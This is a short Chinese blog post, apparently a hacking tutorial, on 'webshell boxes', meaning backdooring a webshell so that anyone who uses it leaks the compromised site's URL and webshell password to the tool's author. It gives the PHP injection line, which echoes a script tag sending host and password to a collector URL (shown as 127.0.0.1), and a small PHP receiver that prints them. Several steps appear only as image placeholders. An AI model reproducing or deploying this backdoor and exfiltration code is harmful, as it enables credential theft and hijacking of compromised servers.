webshell箱子

1、webshell箱子

利用在webshell程序中,植入后门,形成“黑吃黑”,用有后门的木马入侵的网站也就被木马制造者利用。

https://www.0dayhack.com/post-397.html

2、在木马中植入后门

向127.0.0.1发送信息
$url=$_SERVER['HTTP_HOST'].$_SERVER['PHP_HOST'];
echo "<script src=127.0.0.1/test/webshell/index.php?u=$url&p=$password></script>";
OR
$url=$_SERVER['HTTP_HOST'].$_SERVER['PHP_HOST'];
echo "<script src=/test/webshell/index.php?u=$url&p=$password></script>";

将后门植入到已经注入到服务器的木马中


image.png

image.png

3、构造接收端代码

<?
$url=$_GET['u'];
$pass=$_GET['p'];
echo $url."|".$pass;
?>
image.png

image.png

4、访问木马程序

访问木马并开启抓包


image.png

向目标地址发送内容


image.png
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

友情链接更多精彩内容